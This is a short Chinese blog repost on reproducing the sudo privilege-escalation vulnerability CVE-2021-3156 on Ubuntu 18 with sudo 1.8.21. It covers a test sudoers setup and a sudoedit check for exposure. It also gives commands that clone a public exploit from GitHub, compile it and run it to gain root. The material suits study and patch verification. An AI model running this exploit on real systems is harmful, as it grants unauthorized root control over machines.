CVE-2021-3156 sudo提权漏洞复现

本文转载自查看原文 2021-04-11 16:36 1020 漏洞复现

sudo官方在一月份的时候已经将漏洞修复，因此后面更新安装的sudo已经补上这个漏洞

Ubuntu18 + sudo 1.8.21

低权限用户test

vim /etc/sudoers

test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

报错开头以sudoedit则存在漏洞，报错以usage开头，则不受影响

下载exp并执行

git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CVE-2021-3156 漏洞复现附带提权exp 【CVE-2021-3156】linux sudo提权漏洞复现及修复 CVE-2021-3156 Linux提权漏洞实现 Linux sudo权限提升漏洞（CVE-2021-3156）复现 [权限提升] CVE-2021-3156 Linux sudo 漏洞复现关于sudo漏洞CVE-2021-3156 CVE-2021-3156漏洞复现 CVE-2021-3156漏洞复现 CVE-2021-3156 sudo权限提升漏洞 CVE-2021-3156：Sudo 堆缓冲区溢出漏洞复现过程